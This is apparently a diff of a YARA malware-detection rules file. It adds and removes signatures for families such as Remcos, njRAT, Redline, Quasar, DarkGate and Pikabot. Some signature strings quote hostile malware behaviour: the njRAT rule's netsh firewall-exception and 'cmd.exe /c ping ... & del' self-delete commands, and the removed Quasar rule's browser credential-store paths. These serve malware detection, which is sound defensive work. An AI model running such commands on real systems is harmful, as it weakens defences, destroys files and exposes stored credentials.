-		$o3 = {4c 00 6f 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 67 00 69 00 6e 00 20 00 44 00 61 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 74 00 61 00}
+		$r0 = " ______                              " ascii
+		$r1 = "(_____ \\                             " ascii
+		$r2 = " _____) )_____ ____   ____ ___   ___ " ascii
+		$r3 = "|  __  /| ___ |    \\ / ___) _ \\ /___)" ascii
+		$r4 = "| |  \\ \\| ____| | | ( (__| |_| |___ |" ascii
+		$r5 = "|_|   |_|_____)_|_|_|\\____)___/(___/ " ascii
+		$s1 = "Watchdog module activated" ascii
+		$s2 = "Remcos restarted by watchdog!" ascii
+		$s3 = " BreakingSecurity.net" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 5000KB and ( ( all of ( $s* ) ) or ( all of ( $o* ) ) )
+		(( all of ( $r* ) ) or ( all of ( $s* ) ) )
+}
+
+rule EMBEERESEARCH_Win_Agent_Tesla_Bytecodes_Sep_2023
+{
+	meta:
+		description = "No description has been set in the source file - EmbeeResearch"
+		author = "Matthew @embee_research"
+		id = "9d1c5010-7c64-5a6a-bf60-35c042732761"
+		date = "2023-09-21"
+		modified = "2023-09-21"
+		reference = "https://github.com/embee-research/Yara-detection-rules/"
+		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_agent_tesla_bytecodes_sep_2023.yar#L4-L21"
+		license_url = "N/A"
+		hash = "ce696cf7a6111f5e7c6781854de04ddc262b6c9b39c059fd5435dfb3b8901f04"
+		hash = "afc29232c4989587db2c54b7c9f145fd0d73537e045ece15338582ede5389fce"
+		hash = "fba4374163ba25c9dc572f1a5d7f3e46e09531ab964d808f3dde2a19c05a2ee5"
+		logic_hash = "1cc40ab16dfa5245b3146e4512509037f540d59e155040a2336a97cd0f42e612"
+		score = 75
+		quality = 75
+		tags = ""
+
+	strings:
+		$s1 = {8F ?? ?? ?? ?? 25 47 FE ?? ?? ?? FE ?? ?? ?? 91 61 D2 52 20 ?? ?? ?? ?? FE ?? ?? ?? }
+
+	condition:
+		dotnet.is_dotnet and $s1
 }
 
 rule EMBEERESEARCH_Win_Njrat_Bytecodes_Oct_2023
@@ -172762,28 +172730,83 @@ rule EMBEERESEARCH_Win_Njrat_Bytecodes_Oct_2023
 	condition:
 		dotnet.is_dotnet and $s1
 }
-rule EMBEERESEARCH_Win_Marsstealer_Encryption_Bytecodes
+rule EMBEERESEARCH_Win_Darkgate_Xllloader_Oct_2023
 {
 	meta:
-		description = "Encryption observed in MarsStealer"
+		description = "Detects XLL Files Related to DarkGate"
 		author = "Matthew @ Embee_Research"
-		id = "7a66ea9c-966e-5780-8b36-a268904b9c1b"
-		date = "2023-12-24"
-		modified = "2023-12-24"
+		id = "4b5d9a2d-90ee-5452-83be-1677e1888045"
+		date = "2023-10-03"
+		modified = "2023-10-04"
 		reference = "https://github.com/embee-research/Yara-detection-rules/"
-		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_marsStealer_encryption_bytecodes_dec_2023.yar#L1-L16"
+		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_darkgate_xll_loader_oct_2023.yar#L2-L23"
 		license_url = "N/A"
-		hash = "7a391340b6677f74bcf896b5cc16a470543e2a384049df47949038df5e770df1"
-		logic_hash = "49ffde28c8823c00959ddbaa516fc48c7908b533c8f91608b0e3a645045c9048"
+		hash = "091b7c16791cf976e684fe22ee18a4099a4e26ec75fa145b85dd14603b466b00"
+		hash = "305de78353b0d599cd40a73c7e639df7f5946d1fc36691c8f7798a99ee6835e7"
+		hash = "98c59262ad396b4da5b0a3e82f819923f860e974f687c4fff9b852f25a56c50f"
+		hash = "27ec297e1fc34e29963303782ff881e74f8bd4126f4c5be0c4754f745d85f79a"
+		hash = "392fd4d218a8e333bc422635e48fdfae59054413c7a6be764c0275752d45ab23"
+		hash = "9a34b32d0a66dd4f59aeea82ef48f335913c47c6ca901ab109df702cd166892f"
+		logic_hash = "ea9a166550c53225b0a06e2cd86760f63aed8973e889a457470bdba3d87ce6af"
 		score = 75
 		quality = 75
 		tags = ""
 
 	strings:
-		$s1 = {31 2d 3d 31 73 30 02 39 c0 74 0a 5b 70 61 73 64 6c 30 71 77 69 8d 5b 01 8d 52 01 39 eb 75 03 83 eb 20 39 ca}
+		$s1 = "xlAutoOpen" wide ascii
+		$s2 = { 49 ?? ?? 4c ?? ?? 48 ?? ?? 48 ?? ?? 02 e8 ?? ?? ?? ?? 48 ?? ?? 31 ?? 48 ?? ?? 01 48 ?? ?? 41 ?? ?? ?? ?? 30 ?? 48 ?? ?? 01 49 ?? ?? 75 ?? }
 
 	condition:
-		$s1
+		( all of ( $s* ) )
+}
+
+rule EMBEERESEARCH_Win_Xworm_Bytestring
+{
+	meta:
+		description = "Detects bytestring present in unobfuscated xworm"
+		author = "Matthew @ Embee_Research"
+		id = "b7bad89d-ff15-50ae-8c97-64b181dad07f"
+		date = "2023-08-27"
+		modified = "2023-10-18"
+		reference = "https://github.com/embee-research/Yara-detection-rules/"
+		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_xworm_bytestring_sep_2023.yar#L3-L24"
+		license_url = "N/A"
+		hash = "8948b34d471db1e334e6caa00492bd11a60d0ec378933386b0cb7bc1b971c102"
+		hash = "52634ade55558807042eae35e2777894e405e811102e980a2e2b25d151fde121"
+		logic_hash = "dd9955c3616ee65cf94625f5fc92298464a9a3b6deaf32ae70d7e8206c0ceb5b"
+		score = 50
+		quality = 75
+		tags = ""
+
+	strings:
+		$p1 = { 72 [4] 16 28 [4] 16 33 ?? 72 [4] 0C 38 [4] 11 ?? 72 [4] 16 28 [4] 16 33 ?? 72 [4] 0C 38 [4] 11 ?? 72 [4] 16 28 [4] 16 33 ?? 72 [4] 0C 38 [4] 11 ?? 72 [4] 16 28 [4] 16 33 ?? }
+
+	condition:
+		dotnet.is_dotnet and $p1
+}
+
+rule EMBEERESEARCH_Win_Solarmarker_Bytecodes : FILE
+{
+	meta:
+		description = "Detects bytecodes present in solarmarker Packer"
+		author = "Matthew @ Embee_Research"
+		id = "d405e7ae-f09b-5993-a510-e5e1bc289898"
+		date = "2023-09-10"
+		modified = "2023-09-11"
+		reference = "https://github.com/embee-research/Yara-detection-rules/"
+		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_solarmarker_bytecodes_aug_2023.yar#L3-L21"
+		license_url = "N/A"
+		hash = "a433dad1e31f2e19ab5d22b6348c73fa4c874502acc20d5517d785b554754279"
+		logic_hash = "52256184706b7173ee8e8683ac79c1b9d4773778c135e4dae255376c0a6651fb"
+		score = 75
+		quality = 75
+		tags = "FILE"
+
+	strings:
+		$s1 = {8C ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 20 ?? ?? ?? ?? 13 ?? 06 11 ?? 20 ?? ?? ?? ?? 58 D1 8C ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 20 ?? ?? ?? ?? 13 ?? 06 11 ?? 20 ?? ?? ?? ?? 58 D1 8C ?? ?? ?? ?? 28 ?? ?? ?? ??}
+
+	condition:
+		dotnet.is_dotnet and filesize < 7000KB and $s1
 }
 rule EMBEERESEARCH_Win_Lumma_Update_Simple_Strings_Sep_2023 : FILE
 {
@@ -172839,173 +172862,152 @@ rule EMBEERESEARCH_Win_Xworm_Simple_Strings
 	condition:
 		dotnet.is_dotnet and $x1 and ( 2 of ( $s* ) )
 }
-rule EMBEERESEARCH_Win_Cobaltstrike_Pipe_Strings_Nov_2023 : FILE
+rule EMBEERESEARCH_Win_Ursnif_Patterns_Oct_2022
 {
 	meta:
-		description = "Detects default strings related to cobalt strike named pipes"
-		author = "Matthew @ Embee_Research"
-		id = "9237f4e8-b9c4-54cb-9cb2-999d267392af"
-		date = "2023-11-04"
-		modified = "2023-11-04"
+		description = "No description has been set in the source file - EmbeeResearch"
+		author = "Embee_Research @ Huntress"
+		id = "2c8da2b7-63f2-5cce-86ab-8a88f50d0263"
+		date = "2022-10-14"
+		modified = "2023-06-14"
 		reference = "https://github.com/embee-research/Yara-detection-rules/"
-		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_cobaltstrike_pipe_strings_nov_2023.yar#L1-L24"
+		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_ursnif_patterns_oct_2022.yar#L1-L14"
 		license_url = "N/A"
-		hash = "99986d438ec146bbb8b5faa63ce47264750a8fdf508a4d4250a8e1e3d58377fd"
-		hash = "090402a6e2db12cbdd3a889b7b46bb7702acc0cad37d87ff201230b618fe7ed5"
-		hash = "eb2b263937f8d28aa9df7277b6f25d10604a5037d5644c98ee0ab8f7a25db7b4"
-		logic_hash = "ff17fe9d04d9ad6aa5c034b69d412b0d62c48c537c3a54a465761e27e9255e6d"
+		logic_hash = "241804ea3b7ac98071c533d9a98a45cdd0f7043f11994327c1f79e29f5fdce2c"
 		score = 75
 		quality = 75
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$s1 = "%c%c%c%c%c%cMSSE-%d-server"
-		$s2 = "ConnectNamedPipe"
-		$s3 = "CreateNamedPipeA"
-		$s4 = "TlsGetValue"
+		$ursnif = {41 c1 e8 02 45 33 d2 45 8b d9 45 85 c0 74 2f 48 2b ca 83 7c 24 28 00 8b 04 11 44 8b c8 74 0a 85 c0 75 06 44 8d 40 01}
+		$script = "65,193,232,2,69,51,210,69,139,217,69,133,192,116,47,72,43,202,131,124,36,40,0,139,4,17,68,139,200,116,10,133,192,117,6,68,141,64,1"
 
 	condition:
-		( all of ( $s* ) ) and filesize < 500KB
+		any of them
 }
-rule EMBEERESEARCH_Win_Redline_Updated_Bytecodes_Oct_2023
+rule EMBEERESEARCH_Win_Berbew_Strings_Dec_2023
 {
 	meta:
-		description = "Configuration related bytecodes in redline .net files"
+		description = "Strings observed in Berbew malware."
 		author = "Matthew @ Embee_Research"
-		id = "1e4470cf-fad3-57e5-8a95-deb97e98dbdc"
-		date = "2023-10-11"
-		modified = "2023-10-11"
+		id = "402711af-c543-5c95-ae9e-e663825b6653"
+		date = "2023-12-24"
+		modified = "2023-12-26"
 		reference = "https://github.com/embee-research/Yara-detection-rules/"
-		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_redline_bytecodes_oct_2023.yar#L2-L35"
+		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_berbew_strings_dec_2023.yar#L1-L19"
 		license_url = "N/A"
-		hash = "0cc3a0f8b48ef8d8562b9cdf9c7cfe7f63faf43a5ac6dc6973dc8bf13b6c88cf"
-		logic_hash = "77273ba3736baf2c197fb8b17de1e22ba8f2380f73f9114f324ef56bfa508654"
+		hash = "24dc0af3c51118697df999d8bffcdfc9cbf0d07f2630473450dd826a1ae4b9ae"
+		logic_hash = "a7f687e749ec69961777063d52678461a8e288c80037fac051d7b1a5b568d9e8"
 		score = 75
 		quality = 75
 		tags = ""
 
 	strings:
-		$s_1 = {
-				20 ?? ?? ?? ?? 											// ldc.i4
-				2B 00       											// br.s
-				28 ?? ?? ?? 2B 											// Call
-				80 ?? ?? ?? 04 											// stsfld
-				(20 ?? ?? ?? ?? 2B00 28 ?? ?? ?? 2B | 72 ?? ?? ?? 70)   // ldc.i4, br.s, call OR ldstr
-				80 ?? ?? ?? 04      									// Call
-				(20 ?? ?? ?? ?? 2B00 28 ?? ?? ?? 2B | 72 ?? ?? ?? 70)   // ldc.i4, br.s, call OR ldstr
-				80 ?? ?? ?? 04 											// Call		
-				20 ?? ?? ?? ?? 											// ldc.i4
-				2B00            										// br.s
-				28 ?? ?? ?? 2B      									// Call
-				80 ?? ?? ?? 04 											// stsfld
-				2A 														// ret
-			}
-		$s_2 = "mscoree.dll"
+		$s1 = "This KEWL STUFF was coded by V. V. PUPKIN"
+		$s2 = "REAL CASH, REAL BITCHEZ"
+		$s3 = "Please, enter your Card Number"
 
 	condition:
-		$s_1 and $s_2
+		all of them
 }
-
-rule EMBEERESEARCH_Win_Quasar_Rat_Client : FILE
+rule EMBEERESEARCH_Win_Marsstealer_Encryption_Bytecodes
 {
 	meta:
-		description = "Detects strings present in Quasar Rat Samples."
+		description = "Encryption observed in MarsStealer"
 		author = "Matthew @ Embee_Research"
-		id = "7fc0bd6d-e187-51b7-a8b8-68b17271cef8"
-		date = "2023-08-27"
-		modified = "2023-10-18"
+		id = "7a66ea9c-966e-5780-8b36-a268904b9c1b"
+		date = "2023-12-24"
+		modified = "2023-12-24"
 		reference = "https://github.com/embee-research/Yara-detection-rules/"
-		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_quasar_rat_client_aug_2023.yar#L3-L37"
+		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_marsStealer_encryption_bytecodes_dec_2023.yar#L1-L16"
 		license_url = "N/A"
-		hash = "914d88f295ac2213f37d3f71e6d4383979283d1728079a208f286effb44d840c"
-		hash = "45a724179ae1d08044c4bafb69c7f9cdb4ed35891dc9cf24aa664d75464ceb6d"
-		hash = "7e13bcd73232c3f33410aa95f61e1196a2f9ae35e05c1f9c8f251e07077a9dfb"
-		logic_hash = "efba911780ffb144f277e88ff8ca8f53a90c32a677ccb19ec26e71f974a1b91f"
+		hash = "7a391340b6677f74bcf896b5cc16a470543e2a384049df47949038df5e770df1"
+		logic_hash = "49ffde28c8823c00959ddbaa516fc48c7908b533c8f91608b0e3a645045c9048"
 		score = 75
 		quality = 75
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$s1 = "Quasar Client" ascii wide
-		$s2 = "Quasar.Client.Properties.Resources" ascii wide
-		$s3 = "Google\\Chrome\\User Data\\Default\\" wide
-		$s4 = "\\Mozilla\\Firefox\\Profiles" wide
-		$s5 = "Yandex\\YandexBrowser\\User Data\\Default\\" wide
+		$s1 = {31 2d 3d 31 73 30 02 39 c0 74 0a 5b 70 61 73 64 6c 30 71 77 69 8d 5b 01 8d 52 01 39 eb 75 03 83 eb 20 39 ca}
 
 	condition:
-		uint16( 0 ) == 0x5a4d and dotnet.is_dotnet and filesize < 7000KB and ( for any i in ( 0 .. dotnet.number_of_resources -1 ) : ( dotnet.resources [ i ] . name == "Quasar.Client*" ) or ( 3 of ( $s* ) ) )
+		$s1
 }
-
-rule EMBEERESEARCH_Win_Solarmarker_Bytecodes : FILE
+rule EMBEERESEARCH_Win_Redline_Bytecodes_Jan_2024 : FILE
 {
 	meta:
-		description = "Detects bytecodes present in solarmarker Packer"
+		description = "Bytecodes found in late 2023 Redline malware"
 		author = "Matthew @ Embee_Research"
-		id = "d405e7ae-f09b-5993-a510-e5e1bc289898"
-		date = "2023-09-10"
-		modified = "2023-09-11"
+		id = "8acf0fbb-f7d1-5a3d-9ccb-ee21926d6a31"
+		date = "2023-08-27"
+		modified = "2024-01-02"
 		reference = "https://github.com/embee-research/Yara-detection-rules/"
-		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_solarmarker_bytecodes_aug_2023.yar#L3-L21"
+		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_redline_bytecodes_jan_2024.yar#L1-L22"
 		license_url = "N/A"
-		hash = "a433dad1e31f2e19ab5d22b6348c73fa4c874502acc20d5517d785b554754279"
-		logic_hash = "52256184706b7173ee8e8683ac79c1b9d4773778c135e4dae255376c0a6651fb"
+		hash = "ea1271c032046d482ed94c6d2c2c6e3ede9bea57dff13156cabca42b24fb9332"
+		logic_hash = "43f4d718611c16983071587c2806f92550ebba6bae737c59c63cd8584a5cc01f"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = {8C ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 20 ?? ?? ?? ?? 13 ?? 06 11 ?? 20 ?? ?? ?? ?? 58 D1 8C ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 20 ?? ?? ?? ?? 13 ?? 06 11 ?? 20 ?? ?? ?? ?? 58 D1 8C ?? ?? ?? ?? 28 ?? ?? ?? ??}
+		$s1 = {00 00 7E ?? ?? ?? 04 7E ?? ?? ?? 04 28 ?? ?? ?? 06 17 8D ?? ?? ?? 01 25 16 1F 7C 9D 6F ?? ?? ?? 0A 13 ?? 16 13 ?? 38 }
+		$s2 = "mscoree.dll" ascii
 
 	condition:
-		dotnet.is_dotnet and filesize < 7000KB and $s1
+		$s1 and $s2 and uint16( 0 ) == 0x5a4d
 }
-rule EMBEERESEARCH_Win_Ursnif_Patterns_Oct_2022
+
+rule EMBEERESEARCH_Win_Njrat_Strings_Oct_2023
 {
 	meta:
-		description = "No description has been set in the source file - EmbeeResearch"
-		author = "Embee_Research @ Huntress"
-		id = "2c8da2b7-63f2-5cce-86ab-8a88f50d0263"
-		date = "2022-10-14"
-		modified = "2023-06-14"
+		description = ""
+		author = "Matthew @ Embee_Research"
+		id = "c89711cb-aae9-5409-80c2-145a8d5fca56"
+		date = "2023-10-03"
+		modified = "2023-10-03"
 		reference = "https://github.com/embee-research/Yara-detection-rules/"
-		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_ursnif_patterns_oct_2022.yar#L1-L14"
+		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_njrat_strings_oct_2023.yar#L3-L25"
 		license_url = "N/A"
-		logic_hash = "241804ea3b7ac98071c533d9a98a45cdd0f7043f11994327c1f79e29f5fdce2c"
+		hash = "59d6e2958780d15131c102a93fefce6e388e81da7dc78d9c230aeb6cab7e3474"
+		logic_hash = "ed36a991aa2699486f1ef34f4f4d559a3dd351180602f017ad7d868e146c703b"
 		score = 75
 		quality = 75
 		tags = ""
 
 	strings:
-		$ursnif = {41 c1 e8 02 45 33 d2 45 8b d9 45 85 c0 74 2f 48 2b ca 83 7c 24 28 00 8b 04 11 44 8b c8 74 0a 85 c0 75 06 44 8d 40 01}
-		$script = "65,193,232,2,69,51,210,69,139,217,69,133,192,116,47,72,43,202,131,124,36,40,0,139,4,17,68,139,200,116,10,133,192,117,6,68,141,64,1"
+		$s1 = "netsh firewall delete allowedprogram" wide
+		$s2 = "cmd.exe /c ping 0 -n 2 & del" wide
+		$s3 = "netsh firewall add allowedprogram" wide
+		$s4 = "Execute ERROR" wide
+		$s5 = "Update ERROR" wide
+		$s6 = "Download ERROR" wide
 
 	condition:
-		any of them
+		dotnet.is_dotnet and ( all of ( $s* ) )
 }
-
-rule EMBEERESEARCH_Win_Xworm_Bytestring
+rule EMBEERESEARCH_Win_Redline_Payload_Dec_2023
 {
 	meta:
-		description = "Detects bytestring present in unobfuscated xworm"
+		description = "Patterns observed in redline"
 		author = "Matthew @ Embee_Research"
-		id = "b7bad89d-ff15-50ae-8c97-64b181dad07f"
-		date = "2023-08-27"
-		modified = "2023-10-18"
+		id = "6208779a-69b2-55b5-9744-987575c00d96"
+		date = "2023-12-24"
+		modified = "2023-12-29"
 		reference = "https://github.com/embee-research/Yara-detection-rules/"
-		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_xworm_bytestring_sep_2023.yar#L3-L24"
+		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_redline_payload_dec_2023.yar#L1-L16"
 		license_url = "N/A"
-		hash = "8948b34d471db1e334e6caa00492bd11a60d0ec378933386b0cb7bc1b971c102"
-		hash = "52634ade55558807042eae35e2777894e405e811102e980a2e2b25d151fde121"
-		logic_hash = "dd9955c3616ee65cf94625f5fc92298464a9a3b6deaf32ae70d7e8206c0ceb5b"
-		score = 50
+		hash = "5790aead07ce0b9b508392b9a2f363ef77055ae16c44231773849c87a1dd15a4"
+		logic_hash = "d016baa5017120a3037e9cef7fd649228f7be60e511ecbdedf97916f59eec881"
+		score = 75
 		quality = 75
 		tags = ""
 
 	strings:
-		$p1 = { 72 [4] 16 28 [4] 16 33 ?? 72 [4] 0C 38 [4] 11 ?? 72 [4] 16 28 [4] 16 33 ?? 72 [4] 0C 38 [4] 11 ?? 72 [4] 16 28 [4] 16 33 ?? 72 [4] 0C 38 [4] 11 ?? 72 [4] 16 28 [4] 16 33 ?? }
+		$s1 = {16 72 ?? ?? ?? 70 A2 7E ?? ?? ?? 04 17 72 ?? ?? ?? 70 7E ?? ?? ?? 04 16 9A 28 ?? ?? ?? 06 A2 7E ?? ?? ?? 04 18 72 ?? ?? ?? 70 }
 
 	condition:
-		dotnet.is_dotnet and $p1
+		all of them
 }
 
 rule EMBEERESEARCH_Win_Exela_Stealer_Simple_Strings_Sep_2023
@@ -173040,289 +173042,263 @@ rule EMBEERESEARCH_Win_Exela_Stealer_Simple_Strings_Sep_2023
 	condition:
 		dotnet.is_dotnet and ( ( all of ( $s* ) ) or ( 3 of ( $e* ) ) )
 }
-rule EMBEERESEARCH_Win_Orcus_Rat_Simple_Strings_Dec_2023
+
+rule EMBEERESEARCH_Win_Icedid_Snowloader_Bytecodes_Oct_2023
 {
 	meta:
-		description = "Strings observed in Orcus RAT"
+		description = "No description has been set in the source file - EmbeeResearch"
 		author = "Matthew @ Embee_Research"
-		id = "baef6b96-bf94-5363-9186-9761a8055afd"
-		date = "2023-12-24"
-		modified = "2023-12-24"
+		id = "ad5d7bf5-813d-519d-91ae-e6a69fd557df"
+		date = "2023-08-27"
+		modified = "2023-10-18"
 		reference = "https://github.com/embee-research/Yara-detection-rules/"
-		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_orcus_rat_simple_strings_dec_2023.yar#L1-L26"
+		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_icedid_snowloader_bytecodes_oct_2023.yar#L2-L23"
 		license_url = "N/A"
-		hash = "30a2a674d55d7898d304713dd2f69a043d875230ea7ebee22596ba4c640768db"
-		logic_hash = "2e0a44ec2749e0fc646dfb003a2d32b3fecfa07ece72ca5a65116250d80496b8"
+		hash = "e096de90f65ff83ed0e929b330aa765a8e2322625325fb042775bff1748467cc"
+		hash = "e87928fcddf13935c91a0b5577e28efd29bb6a5c1d98e5129dec63e231601053"
+		hash = "82a01607ebdcaa73b9ff201ccb76780ad8de4a99dd3df026dcb71b0f007456ed"
+		logic_hash = "5baa308ce130cbbe80f94fc127b083f26ae87552910c2bc6f3bae3008cf1aa63"
 		score = 75
 		quality = 75
 		tags = ""
 
 	strings:
-		$s1 = "Orcus is a Remote Administration Tool for Windows. It allows the administrator to make changes to the system remotely." wide
-		$s2 = "Orcus.Service" wide
-		$s4 = "costura.orcus" wide
-		$s5 = "Orcus.Commands"
-		$s6 = "Orcus.Shared"
-		$s7 = "Orcus.Utilities"
-		$s8 = "Orcus.StaticCommands"
-		$s9 = "Orcus.Plugins"
+		$s_1 = {4c 77 26 07}
+		$s_2 = {58 a4 53 e5}
+		$s_3 = {10 e1 8a c3}
 
 	condition:
-		(5 of them )
+		( all of ( $s* ) ) and pe.number_of_exports > 20
 }
 
-rule EMBEERESEARCH_Win_Njrat_Bytecodes_V2_Oct_2023
+rule EMBEERESEARCH_Win_Pikabot_Resource_Entropy_Oct_2023
 {
 	meta:
-		description = ""
+		description = "Pikabot Loaders embedding encrypted inside of numerous png images"
 		author = "Matthew @ Embee_Research"
-		id = "9090574e-7ad4-5207-af8b-7b56f2a1c917"
+		id = "253d35ae-a325-51c7-8da5-32bb46c51acd"
 		date = "2023-10-03"
 		modified = "2023-10-08"
 		reference = "https://github.com/embee-research/Yara-detection-rules/"
-		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_njrat_bytecodes_v2_oct_2023.yar#L5-L27"
-		license_url = "N/A"
-		hash = "9877fc613035d533feda6adc6848e183bf8c8660de3a34b1acd73c75e62e2823"
-		hash = "40f07bdfb74e61fe7d7973bcd4167ffefcff2f8ba2ed6f82e9fcb5a295aaf113"
-		logic_hash = "0bdbf5715e3873d96c88a24ba08487af2b798d26cdcd3e35d783ce4828dae775"
-		score = 75
-		quality = 75
-		tags = ""
-
-	strings:
-		$s1 = {03 1F 72 2E ?? 03 1F 73 2E ?? 03 1F 74 2E ?? 03 1F 75 2E ?? 03 1F 76 2E ?? }
-		$s2 = {0B 14 0C 16 0D 16 13 ?? 16 13 ?? 14}
-
-	condition:
-		dotnet.is_dotnet and ( all of ( $s* ) )
-}
-
-rule EMBEERESEARCH_Win_Agent_Tesla_Bytecodes_Sep_2023
-{
-	meta:
-		description = "No description has been set in the source file - EmbeeResearch"
-		author = "Matthew @embee_research"
-		id = "9d1c5010-7c64-5a6a-bf60-35c042732761"
-		date = "2023-09-21"
-		modified = "2023-09-21"
-		reference = "https://github.com/embee-research/Yara-detection-rules/"
-		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_agent_tesla_bytecodes_sep_2023.yar#L4-L21"
+		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_pikabot_resource_entropy_oct_2023.yar#L5-L40"
 		license_url = "N/A"
-		hash = "ce696cf7a6111f5e7c6781854de04ddc262b6c9b39c059fd5435dfb3b8901f04"
-		hash = "afc29232c4989587db2c54b7c9f145fd0d73537e045ece15338582ede5389fce"
-		hash = "fba4374163ba25c9dc572f1a5d7f3e46e09531ab964d808f3dde2a19c05a2ee5"
-		logic_hash = "1cc40ab16dfa5245b3146e4512509037f540d59e155040a2336a97cd0f42e612"
+		hash = "936247d9a0ce76bed17f03430186abb9ecafa88ef3a968cdd46c5b0a24a5cc3f"
+		hash = "2c7b7c3ec8a6a835e07c8feed401460e185388f59ea5fc8aa8038d2b75815666"
+		hash = "00239c55d7135aa06e21ace557a3e8bf3818c2e07051c84753209e7348b6a426"
+		hash = "5f218eeb83c936d88b65ec3f3052d8c53f58775dacc04bedc91bd388fb7bb885"
+		hash = "6bea3ecd1f43bdcc261719fb732fcf27e82ed6f4b086616925291a733f358a26"
+		hash = "966042f3e532b6abce7d96bbdb91dc4561b32a4b0b9eec7b08b4f1024c2da916"
+		hash = "951c906a1fa179050d30c06849d42e49a295dd1baad91efb244b2e5486b5801d"
+		hash = "a06bd2623c389f2547d0bf750ca720ab7a74c90982267aad49ba31d5de345288"
+		hash = "aeb2bf8898636b572b0703d9ddb90b9a4c5c6db9eee631ee726ad753f197ac12"
+		logic_hash = "7beec034fc927990734691bd6859870921027860c0591c7a0d5a3815f919112d"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = ""
 
 	strings:
-		$s1 = {8F ?? ?? ?? ?? 25 47 FE ?? ?? ?? FE ?? ?? ?? 91 61 D2 52 20 ?? ?? ?? ?? FE ?? ?? ?? }
+		$s1 = "ARROW-DOWN" wide
+		$s2 = "ARROW-LEFT" wide
+		$s3 = "ARROW-RIGHT" wide
 
 	condition:
-		dotnet.is_dotnet and $s1
+		pe.DLL and ( all of ( $s* ) ) and pe.number_of_resources > 25 and pe.sections [ 3 ] . raw_data_size > 400KB and math.entropy ( pe.sections [ 3 ] . raw_data_offset , pe.sections [ 3 ] . raw_data_size ) > 7.5
 }
-rule EMBEERESEARCH_Win_Medusa_Bytecodes
+rule EMBEERESEARCH_Win_Stealc_Bytecodes_Oct_2023
 {
 	meta:
-		description = "Medusa Bytecodes"
+		description = "Bytecodes present in Stealc decoding routine"
 		author = "Matthew @ Embee_Research"
-		id = "48b659f8-cd26-540a-89b6-6349f8d21e8f"
+		id = "ecac28a0-cd77-5e6a-8af2-59ea62e733bf"
 		date = "2023-08-27"
-		modified = "2024-03-03"
+		modified = "2023-10-09"
 		reference = "https://github.com/embee-research/Yara-detection-rules/"
-		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_medusa_dotnet_bytecodes.yar#L1-L17"
+		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_stealc_bytecodes_oct_2023.yar#L2-L21"
 		license_url = "N/A"
-		hash = "a1211549b4e1a7befd953d03b4d929b3dc9f25ec6c1bc9c05ae92a0ec08fb77c"
-		logic_hash = "aa01afd6981af99625a9fca93e512cc00931aca18e55c5cb6dee11efb9ea2968"
+		hash = "74ff68245745b9d4cec9ef3c539d8da15295bdc70caa6fdb0632acdd9be4130a"
+		hash = "9f44a4cbc30e7a05d7eb00b531a9b3a4ada5d49ecf585b48892643a189358526"
